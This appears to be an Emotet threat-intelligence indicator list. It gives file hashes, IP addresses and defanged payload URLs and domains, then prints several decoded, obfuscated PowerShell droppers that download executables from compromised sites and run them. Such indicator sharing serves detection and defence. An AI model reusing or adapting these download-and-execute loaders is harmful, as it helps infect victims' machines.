- #Emotet #Docs #malware #OSINT #IOC
- SHA256:
- 40dfd40fd3c52f25193b940453a50e1102ef1318ee824639fd29957d8c9d3c9a
- ddc0b4a6a21a497ce6131407914c6bd00b1080f8f195a970c0ce2314a1c6cac0
- 1ed6c70d9db5647fe2f890dc49a5969ba527a573f145da494497cb82bde38d39
- 6efb916faef60ea0d4799e040975dc4ffdef08bb0aa5b15385f0bf6fbf426407
- 2fea8b7f5754e42358ec1079c8f5995e1e733153af5101e3c786980aad17824d
- 57ee417cb3400d780d2ce67d7c9aab2ad85b432ff2f414d1844d395a4d8992b3
- cb90272c314a4f1fa20fc87b07f4616d810102f4afe3dbd7f260eb9cdac00f8f
- 6bfb56b285ed97664a586743af9ec1bec72255af2731174be05a1236883b0129
- a848bea60e6257d01e25d7ca5944a9781c123fba443b5de6b84f20a9599a53f1
- f90d3c222ccffad10a3ef4d79bd050360045d683c9a1610f7f70b75291a61d8b
- 94e5a6b8f34d974325965d03b024b0a8beab2d2b69710c571643586de555727e
- 7955dfdb89d471adb7751d49e7cd02473936b90ef8ed1e87d43f29a1945db8ab
- 3b87b742002b973d033d06a0392bcebfb3073fae103e48cc81f1d57b55e92525
- 3aa5f65cd6e68ee14b50cfd4c02d1ea4ee67196bcda382d14ae41cad884461de
- 3c4afdb13944ec108a4df3e7c055e82947fa70961ecc0029971204108da7ae7b
- ebab708f03ee6f65f5d74463903c11d08108d9b335a01b1c504fb44a337b7ef7
- 8497faf7956deca580f40179c41fa928c0a810d44b9522acf54d00062baefad7
- 341e9a1b4252cc46eaaf7518c4a09a3f4caea692bb29798760dbc23601731ca5
- 86c72a65b1735618b61ec33aa50fb2e32bc48a0d90a292a414d5d687f4ff580d
- d264878eae29d3da022f38e67a38560346ba42cbb6dbebbf0e6c852c666fb1ac
- 3cfd7d5452d330e27f670313792a40a4a67ac6480e162313f408b4e53582f631
- f81e4de8069e9551180db92af779f1c19f7bfef0dde8f9696ae0b242d3fb8f2d
- 493fbab43b8eaf0772394866842fa9474e8e54a84894498828af06590dff1cbd
- 5efa2b73134b720b789e7a0ae1798e3a491be917db79092a8f0cb6bbcaa759d3
- edb2d0b8c8a23dd9b734215054477b38a7e623586ee26535725415d3e9fc0a69
- d48ae5457d3cb5fa376e574a9bc66b5e43b6ef5cf54febbd7b4d23357826435c
- 6e4be99b94c2186dba5fd19c6a73c7396cfb050c6bfd1e7b15853913eaa25790
- c95c38c762b20a9a783e21bec9d1b93ed8abfbfe11350447b87875396f06abd9
- a4bb87f70485b94552892dc632dca86767dbc62da4e55db7861d9679926eee5b
- 4d3053d9bac3a76162c8e96a951412ba99d5dbc0d6a1feb36b49db1b50f1b7f6
- 97606dbedb8ab3acf375ef7c84f2ffe377af685a7539770967d1a36cb5dbf752
- 731e691b6611bd3b3f49873097fcd5f5f7ffa5524242cba77e04f0cd1011d106
- 4564887cac06e653978a7c338631202fd4835bcca720e345d56cc0a8507ac1f9
- be55a09daaa90acd0c26dc0ef106015fcf2a568cfa978ef2c5100496490bf16b
- bc180b0be3256cf4ec6a9efda2f8a29d78c86e5629a9ed13157cb27743756087
- 5a98792e4de10c9cc05bc756368773f9508680e67448b7185d3906959f288805
- c16ff0992cfed0a759745ba24ecf817ccc18b85167223727f0a4060b302269ef
- d18b82df0184f35eb170be8177238aa8237ad55cf40a7a0ddcf3aa0ac63b9763
- 176034f1b8e8a8954b0b305a5473045f0616ce4615fa92bbc6e201d58c12b661
- 661afae9cedb766f0717b71057f1e5ed0e6196f949dfc7c2d44224f77b6e42e4
- d88ad8af3cdc4ade883d0afff8c98114ac25e6619b3334d3a51a12b4455d3734
- a47f7f73a3a913fa2748392e89473be12a79dc697133b51fbb0fd287b5ec4e72
- a52f03c02f09f5b7362e30e2631038dd6abc12048d37f97745f7d295fc8b6f94
- 7e52a1a707309d4bcc67f4d66745d5f7635d12ea6a4edd6a69cf52cc34b51414
- 0efb0955bee11a298cc083ff5d5efad51e7d780135bb4783beed690dadc28bb1
- e85ba8d9310dae4ec14642c36c11ffba802eb88af51a5b9302f13f7e006d56e3
- 1df9df819ad7c5cd36928c1cc5f000a9bd5ef7521a4d75b2eb3dbed61e08272a
- c24383a38bc551ab44546118aae0103bee945e1973a2273948e1b7c872a13dbd
- d38d742aac9e7e8163883c02f3d9a04a485c059f0b52846fca23571c36941191
- d4cbd06c243f6df3e9a29acc56638f3fcfc3a8acf866c600458d002824902762
- 67dddcb1b872cf27b06e1c1bbe1142f2b104e7b2abeb600188bb929648cb8e5c
- ff0ebab531232f9ae8d5b2ad78ace8848adffedec41de03b8676c956c14c6015
- caf6516eb4a4a757d7e22374ff6ec4fa6a4336aca97714c77ffd3c264a4a0309
- 04b8d99bb7e4aea164206088cbea57c4d7477d0b1f417d104ff8f05470a10a15
- 39ab82b299fe466e775d32f90ca2f59b3d3d1aa1d3b17000b5995f26f07f774d
- 9653845487d1b3c5f4a30493f9a0df6df6f9f50677748425b87c6a9480793d45
- 7606382de0ca46783167f6b493b98e3f67c8858a91683cb57995239e03514285
- 21a313bc3b7b33c49abbc4eff7e08f212b15c5247ea9a8fce5320ae77172c526
- a302a49cafa48ab0b8d686124f89eb0517a014f31fcb5dc4eb8b574854fbc0c8
- b43c1e041bad2db23e5b14ed9fedafb40c6c42a3af0d3124953e2984b06f9038
- cf4de1b852a28193190bb1a8ec3d48ba28bdcc7aad6bd67944cae6e15cef53cf
- 8906500d2bf022e69b9f3b29388d2b7a8e398d127d023c7aeb6eb2d399fa0693
- be9508b06ac529e53e81f008999cc6ddfc0402beb7506e6094c0d8bdacfafb55
- 8ee5aae6fb9d81c6a4e85f924675fe62f29639141ad7911eeeb96d7cf26ceee9
- 52b6c67df2a895a98d3cde7dd664e2fa6ccf834e9efe8ce45666b2cf3ef79594
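- IPs (several entries, e.g. the 104.x and 172.67.x addresses, look like shared CDN or shared-hosting addresses; confirm before blocking on IP alone):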
- 103.129.98.47
- 103.139.3.19
- 103.233.25.209
- 104.18.61.2
- 104.24.96.193
- 104.27.148.20
- 104.27.149.20
- 104.27.176.16
- 104.27.177.16
- 104.31.64.119
- 107.180.47.3
- 107.180.47.4
- 107.180.57.91
- 112.213.89.126
- 117.78.27.128
- 13.232.244.117
- 142.11.239.9
- 148.66.136.52
- 149.255.62.8
- 154.16.119.127
- 154.219.173.66
- 160.153.47.32
- 162.241.156.188
- 172.67.137.58
- 172.67.219.99
- 177.185.194.162
- 177.185.196.31
- 177.185.206.82
- 178.210.75.228
- 186.64.114.45
- 186.64.114.85
- 186.64.118.165
- 191.6.205.100
- 191.6.208.15
- 192.185.5.43
- 198.252.99.131
- 198.71.233.9
- 206.225.86.233
- 216.37.42.40
- 31.31.198.12
- 3.219.21.58
- 3.23.199.247
- 34.75.142.181
- 47.112.152.109
- 64.37.60.39
- 68.183.158.235
- 69.46.6.238
- 69.64.57.24
- 77.105.36.132
- 81.88.52.104
- 83.166.151.246
- 84.246.212.141
- 88.218.116.196
- 94.237.78.68
- 98.102.204.206
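- URLs (defanged with hxxp/hxxps. Some entries still carry residue from the decoded script: a trailing `."S`PLiT"([char]42);` or stray `)(` left over from string concatenation. This residue is not part of the URL, so strip it before using an entry as an indicator. Most URLs in the concatenation-obfuscated script block further down are not repeated in this list):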
- hxxps://harugomnhat.mizi.vn/lfv9u/Yc31L165329/
- hxxp://betmagik.com/wp-includes/e6eT18030/
- hxxp://aofortunes.com/9gipx/wOOY59/
- hxxp://yourman.co.uk/hWftFfZpx/uRkkm0115/
- hxxps://serenitynailsfranklin.com/wp-includes/OU50007/."S`PLiT"([char]42);
- hxxp://exam.panalearning.com/pana/e/
- hxxp://www.interibericos.com/data/S/
- hxxp://www.mcsgroup.co/multifunctional_resource/J/
- hxxp://pcantivirusnumber.com/wp-includes/N7/
- hxxp://bluetechprism.com/css/o/
- hxxp://familiachickenargentina.com/cgi-bin/0/
- hxxp://todaymailbox.com/cgi-bin/QrR/)."s`pLiT"([char]42);
- hxxp://cryptokuota.com/assets/ayQUtnd403/
- hxxp://fgajardo.com/pruebas/iTfVzJiNG/
- hxxps://www.pharma-israel.org.il/wp-content/oJSUC/
- hxxp://popweb.com.br/remedios/QUSArASDIIdPz/
- hxxp://megasolucoesti.com/R9KDq0O8w/mg7e129370/
- hxxp://idealli.com.br/journal/lhaci5i5315/
- hxxp://airmaxx.rs/MbKoqsSL/)."S`plit"([char]42);
- hxxp://muliarental.com/wp-includes/uwr_u4_ed3qzbb/
- hxxp://ltrybus.com/cgi-bin/mff_xao9d_5ld5qajfmx/
- hxxp://my6thgen.org/_db_backups/t_e_v7qizcr2/
- hxxp://mywebnerd.com/bluesforsale/zi6_v4g0_rmyg/
- hxxp://www.naayers.org/Library/o_eo_97ml/."SPl`iT"([char]42);
- hxxp://www.luxelistreviews.com/wp-includes/AYR/
- hxxps://www.yhyhzx.com/wp-admin/pKpz/
- hxxp://mediadrive.nichost.ru/awfcatfre/9thw57489/
- hxxp://kumarpratham.com/fonts/Wtuq/
- hxxp://fxea.club/wp-includes/mPqJMPzx/
- hxxps://xiangfu.phjrt.com/0qeoy/voB355f13v2j475/
- hxxps://www.batamry.com/tmp/baeng79095371/)."Spl`IT"([char]42);
- hxxps://alameenmission.net/cgi-bin/Ju1r8t/
- hxxps://www.altopropiedades.cl/fonts/AWM/
- hxxp://anisoph.com/cgi-bin/u95B/
- hxxp://identisoft.pt/istore/7U/
- hxxp://b3shop.net/calendar/nnxakTd/
- hxxp://nourishmentjuices.com/wp-content/e/
- hxxps://en.entechco.com.vn/wp-includes/9XMEI7/)."S`PLIT"([char]42);
- hxxp://chendo)n(ghui.cn)/w(p-co)(ntent/Z/
- hxxp://mathisprost.lu/wp-admin/EjNkLlwjGEk/
- hxxp://www.mexpresscargo.com/apmbh/uEJLd4i3b12/
- hxxp://facanha.com.br/temp/XVmDFA/
- hxxp://www.dougsuniverse.com/pics/VzC1ngzg67686813/
- hxxp://admvero.com.br/minhaagua/fmeogbIkCT/
- hxxps://itisfuture.com/wp-content/Zg21h52700782/
- hxxps://alameenmission.net/data_backup/fSQiDxHCGysYT/)."S`PlIt"([char]42);
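- Domains (taken from the URLs above; the `chendo)n(ghui.cn)` entry carries the same string-concatenation residue, and alameenmission.net is listed twice):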
- harugomnhat.mizi.vn
- betmagik.com
- aofortunes.com
- yourman.co.uk
- serenitynailsfranklin.com
- exam.panalearning.com
- www.interibericos.com
- www.mcsgroup.co
- pcantivirusnumber.com
- bluetechprism.com
- familiachickenargentina.com
- todaymailbox.com
- cryptokuota.com
- fgajardo.com
- www.pharma-israel.org.il
- popweb.com.br
- megasolucoesti.com
- idealli.com.br
- airmaxx.rs
- muliarental.com
- ltrybus.com
- my6thgen.org
- mywebnerd.com
- www.naayers.org
- www.luxelistreviews.com
- www.yhyhzx.com
- mediadrive.nichost.ru
- kumarpratham.com
- fxea.club
- xiangfu.phjrt.com
- www.batamry.com
- alameenmission.net
- www.altopropiedades.cl
- anisoph.com
- identisoft.pt
- b3shop.net
- nourishmentjuices.com
- en.entechco.com.vn
- chendo)n(ghui.cn)
- mathisprost.lu
- www.mexpresscargo.com
- facanha.com.br
- www.dougsuniverse.com
- admvero.com.br
- itisfuture.com
- alameenmission.net
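- Decoded Base64 PowerShell (URLs defanged; string quotes were lost in decoding, so the text is not valid PowerShell as shown. Each variant creates a Net.WebClient, walks its URL list split on [char]42 (`*`), saves the download as an .exe under $env:temp or $env:userprofile, and starts it with Invoke-Item or win32_Process Create only if the file length meets a size threshold):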
- $E6q99jv=Gi1h557;
- [Net.ServicePointManager]::"S`e`cU`RiTyPRotocOl" = tls12, tls11, tls;
- $U1ug2ud = Nmdj;
- $Bp_6i6_=V4nz2s8;
- $Kdv295r=$env:temp\$U1ug2ud.exe;
- $K7zfs_s=Ck005bz;
- $Jl23oxf=.(new-object) nET.wEbCLieNT;
- $Rzx3ro0=hxxps://harugomnhat.mizi.vn/lfv9u/Yc31L165329/
- hxxp://betmagik.com/wp-includes/e6eT18030/
- hxxp://aofortunes.com/9gipx/wOOY59/
- hxxp://yourman.co.uk/hWftFfZpx/uRkkm0115/
- hxxps://serenitynailsfranklin.com/wp-includes/OU50007/."S`PLiT"([char]42);
- $F4z36v1=H53q6ar;
- foreach($G5jdj54 in $Rzx3ro0){try{$Jl23oxf."downl`o`ADF`ILe"($G5jdj54, $Kdv295r);
- $Yrewqh4=Xk297a9;
- If ((.(Get-Item) $Kdv295r)."LE`Ng`Th" -ge 36019) {.(Invoke-Item)($Kdv295r);
- $Tr95fu4=P7yhc6c;
- break;
- $Rbm9cg_=P6v63hj}}catch{}}$Zmeutr4=Hr6mf76$Fvu_sp2=(A9ic1n8);
- &(new-item) $ENV:tEmP\OffIcE2019 -itemtype DIrEcToRY;
- [Net.ServicePointManager]::"SeCURi`T`yPro`T`OcoL" = (tls12, tls11, tls);
- $Gcsz806 = (Svwgqk);
- $Hcecvx1=(Mq4880r);
- $Afej916=$env:temp(({0}Office2019{0})-f [cHar]92)$Gcsz806(.exe);
- $Ppgjas4=(Xfj_mny);
- $Tgmwmvt=&(new-object) net.WeBclient;
- $A9rlxeo=(hxxp://exam.panalearning.com/pana/e/
- hxxp://www.interibericos.com/data/S/
- hxxp://www.mcsgroup.co/multifunctional_resource/J/
- hxxp://pcantivirusnumber.com/wp-includes/N7/
- hxxp://bluetechprism.com/css/o/
- hxxp://familiachickenargentina.com/cgi-bin/0/
- hxxp://todaymailbox.com/cgi-bin/QrR/)."s`pLiT"([char]42);
- $Yzj9ong=(I_1w9q_);
- foreach($Mllessq in $A9rlxeo){try{$Tgmwmvt."Do`wnLo`Ad`FiLE"($Mllessq, $Afej916);
- $Gla3ja7=(Grfpn1w);
- If ((.(Get-Item) $Afej916)."LEN`g`Th" -ge 22387) {.(Invoke-Item)($Afej916);
- $S0izu7h=(W9a4h1q);
- break;
- $Z1bn759=(My8h30v)}}catch{}}$P5ir3vz=(Utod6_c)$Gzuprpf=(Nc45xy8);
- &(new-item) $eNv:temp\oFFIce2019 -itemtype dIrecTory;
- [Net.ServicePointManager]::"seCU`RI`TYPRo`TocOL" = (tls12, tls11, tls);
- $Uukttua = (R_o2c8hj4);
- $Zh11xjz=(E08ma9i);
- $Jo0nogv=$env:temp((tS5Office2019tS5)-CRePlacE tS5,[cHAR]92)$Uukttua(.exe);
- $Wln3fex=(Wufjmnr);
- $Joq2eak=&(new-object) nET.WEBCLiEnT;
- $Lo733aj=(hxxp://cryptokuota.com/assets/ayQUtnd403/
- hxxp://fgajardo.com/pruebas/iTfVzJiNG/
- hxxps://www.pharma-israel.org.il/wp-content/oJSUC/
- hxxp://popweb.com.br/remedios/QUSArASDIIdPz/
- hxxp://megasolucoesti.com/R9KDq0O8w/mg7e129370/
- hxxp://idealli.com.br/journal/lhaci5i5315/
- hxxp://airmaxx.rs/MbKoqsSL/)."S`plit"([char]42);
- $Qoq953p=(D1s9bm0);
- foreach($V1lqyq2 in $Lo733aj){try{$Joq2eak."DOwn`Loa`DFIle"($V1lqyq2, $Jo0nogv);
- $Nxb87b8=(On6ddpv);
- If ((.(Get-Item) $Jo0nogv)."lE`NgTH" -ge 36397) {.(Invoke-Item)($Jo0nogv);
- $P1wslwd=(Vypxzlu);
- break;
- $S31lvpv=(Pnr9mrz)}}catch{}}$Rqqwn0h=(Z_corh7)$IQYJUppm=WKOYOzwu;
- [Net.ServicePointManager]::"sEC`U`Ri`TYPRoT`ocOl" = tls12, tls11, tls;
- $FYOFEndz = 659;
- $IWRGHkts=TFYCSgbk;
- $VXKIXdhc=$env:userprofile\$FYOFEndz.exe;
- $LDUTLrks=GJPIKwzq;
- $QGQZAtqo=&(new-object) nEt.WEbCLient;
- $RUUNJyzq=hxxp://muliarental.com/wp-includes/uwr_u4_ed3qzbb/
- hxxp://ltrybus.com/cgi-bin/mff_xao9d_5ld5qajfmx/
- hxxp://my6thgen.org/_db_backups/t_e_v7qizcr2/
- hxxp://mywebnerd.com/bluesforsale/zi6_v4g0_rmyg/
- hxxp://www.naayers.org/Library/o_eo_97ml/."SPl`iT"([char]42);
- $RKRZAxqs=YHVSNowi;
- foreach($YJLGSrkb in $RUUNJyzq){try{$QGQZAtqo."dOwn`L`oad`FiLE"($YJLGSrkb, $VXKIXdhc);
- $JPLAVojm=IKUCCcsk;
- If ((&(Get-Item) $VXKIXdhc)."LEnG`TH" -ge 20603) {([wmiclass]win32_Process)."Cre`Ate"($VXKIXdhc);
- $MCXCTkml=OVBMCiqa;
- break;
- $QOCQNnih=VETADnow}}catch{}}$LMSPIdey=HYSTMbpt$Mrr31m_=(Vysd7kk);
- .(new-item) $eNv:tEmp\offiCE2019 -itemtype dIREctory;
- [Net.ServicePointManager]::"Se`c`U`RiTY`PROt`OcoL" = (tls12, tls11, tls);
- $Fjqkw_l = (C3bc3av5i);
- $L7k7j7g=(Fxgw34m);
- $Dl5edc6=$env:temp(({0}Office2019{0}) -F [chAR]92)$Fjqkw_l(.exe);
- $Hpu2g9_=(E59ihr7);
- $Lrigowf=&(new-object) net.wEbcLient;
- $Xcnye2g=(hxxp://www.luxelistreviews.com/wp-includes/AYR/
- hxxps://www.yhyhzx.com/wp-admin/pKpz/
- hxxp://mediadrive.nichost.ru/awfcatfre/9thw57489/
- hxxp://kumarpratham.com/fonts/Wtuq/
- hxxp://fxea.club/wp-includes/mPqJMPzx/
- hxxps://xiangfu.phjrt.com/0qeoy/voB355f13v2j475/
- hxxps://www.batamry.com/tmp/baeng79095371/)."Spl`IT"([char]42);
- $Oo9e89o=(X8dxwra);
- foreach($Ws0zexn in $Xcnye2g){try{$Lrigowf."doW`N`LoAD`FILe"($Ws0zexn, $Dl5edc6);
- $Te1fjrf=(Xxzq993);
- If ((.(Get-Item) $Dl5edc6)."Len`g`Th" -ge 34409) {&(Invoke-Item)($Dl5edc6);
- $Ncn7i2n=(Y6j6mb1);
- break;
- $Ssd22nc=(Liki0z0)}}catch{}}$J8dpyns=(Jemx7xu)$Nx5uktw=(Hss2_s4);
- &(new-item) $ENV:TEmp\OfFicE2019 -itemtype DiRecTORy;
- [Net.ServicePointManager]::"SEc`URIt`yPR`OToCOL" = (tls12, tls11, tls);
- $Zs3iyv3 = (Uirxlt7t);
- $R5r12dq=(Eopn7tv);
- $Cm8trm1=$env:temp(({0}Office2019{0})-f [cHAR]92)$Zs3iyv3(.exe);
- $Zi_5_ws=(Cppdfy_);
- $Wicv0ib=&(new-object) nEt.webclieNT;
- $Vdj5_s0=(hxxps://alameenmission.net/cgi-bin/Ju1r8t/
- hxxps://www.altopropiedades.cl/fonts/AWM/
- hxxp://anisoph.com/cgi-bin/u95B/
- hxxp://identisoft.pt/istore/7U/
- hxxp://b3shop.net/calendar/nnxakTd/
- hxxp://nourishmentjuices.com/wp-content/e/
- hxxps://en.entechco.com.vn/wp-includes/9XMEI7/)."S`PLIT"([char]42);
- $Hgxzfht=(Bb4enl8);
- foreach($Brg8bgp in $Vdj5_s0){try{$Wicv0ib."dOWN`LO`ADFilE"($Brg8bgp, $Cm8trm1);
- $X9nk8zn=(I3xmymv);
- If ((&(Get-Item) $Cm8trm1)."l`eNg`Th" -ge 30065) {&(Invoke-Item)($Cm8trm1);
- $Rcz87u3=(P404nm4);
- break;
- $Thhlz5x=(Onnvg21)}}catch{}}$H1zjh3a=(Pvm8pk0)$Q4uhf4q=(R3up(buc));
- &(new-item) $env:temP\WoRd\2019\ -itemtype dIReCTORY;
- [Net.ServicePointManager]::"SECuRitY`P`R`oTOcoL" = (tl(s12)(, tl)(s11)(, tls));
- $Bm8fcn9 = (D(3v9)3m);
- $L_runu6=((V4a)8(8l1));
- $R0nzdqu=$env:temp(((flMwo)(rdfl)(M2019flM))."REpL`A`CE"(([chAR]102[chAR]108[chAR]77),[StRing][chAR]92))$Bm8fcn9((.ex)e);
- $Ws2am7e=(Mk(zbk3_));
- $Cb9j7fa=&(new-object) NeT.wEBcLiEnT;
- $Wu6w1qa=((hxxp):/(/thestratums)(phe)(re.)(com/wp-admin/wODL/
- ht)(tps://tmlsc)(onsu)(ltin)(g.c)(om/abay)/RI/(
- hxxps:)/(/is-y)(ap.com/w)p(-admin/AA7/
- hxxp://chendo)n(ghui.cn)/w(p-co)(ntent/Z/
- hxxp):/(/ve)(terina)ri(apetl)(ife.)(cl/4)br(/AX)(C5/
- )(hxxp:)//(blueseaspor)(ts.c)(om/iv/
- ht)(tp://we)bdemo(.cl)/(clm)(d/hVf)/)."S`plIt"([char]42);
- $Hxdizjd=((Vs1xay)f);
- foreach($F1hsz78 in $Wu6w1qa){try{$Cb9j7fa."d`OwnLOA`dfIlE"($F1hsz78, $R0nzdqu);
- $K32qbl5=((Wecd7)5_);
- If ((.(Get-Item) $R0nzdqu)."l`E`NgTh" -ge 21406) {&(Invoke-Item)($R0nzdqu);
- $Pwkismw=((Rh5f)(rl5));
- break;
- $Uwtbun_=((Nnu)(g_g)a)}}catch{}}$Q6pc7y9=((Dbnd)apn)$Ross7z1=(Qeuvqmy);
- .(new-item) $Env:TemP\oFfiCE2019 -itemtype dIrECToRy;
- [Net.ServicePointManager]::"s`E`c`URIt`YProtOcOl" = (tls12, tls11, tls);
- $Xss8gv4 = (Qwe8qg);
- $P6d8649=(Nrqjol4);
- $Mrfq_y6=$env:temp(({0}Office2019{0}) -F[cHAr]92)$Xss8gv4(.exe);
- $U2646ek=(O6pjvr7);
- $W9zvoww=.(new-object) NET.WebCLient;
- $G1k4mk5=(hxxp://mathisprost.lu/wp-admin/EjNkLlwjGEk/
- hxxp://www.mexpresscargo.com/apmbh/uEJLd4i3b12/
- hxxp://facanha.com.br/temp/XVmDFA/
- hxxp://www.dougsuniverse.com/pics/VzC1ngzg67686813/
- hxxp://admvero.com.br/minhaagua/fmeogbIkCT/
- hxxps://itisfuture.com/wp-content/Zg21h52700782/
- hxxps://alameenmission.net/data_backup/fSQiDxHCGysYT/)."S`PlIt"([char]42);
- $Nq8y437=(Skbd_dj);
- foreach($Ck7935l in $G1k4mk5){try{$W9zvoww."do`wNL`Oad`FiLE"($Ck7935l, $Mrfq_y6);
- $Vomgvnd=(Onn_nyj);
- If ((&(Get-Item) $Mrfq_y6)."len`gTH" -ge 20712) {&(Invoke-Item)($Mrfq_y6);
- $N10pfpa=(Jdudh2q);
- break;
- $Rpgf1nf=(Ldpp7fb)}}catch{}}$Zssnllz=(Iliktnn)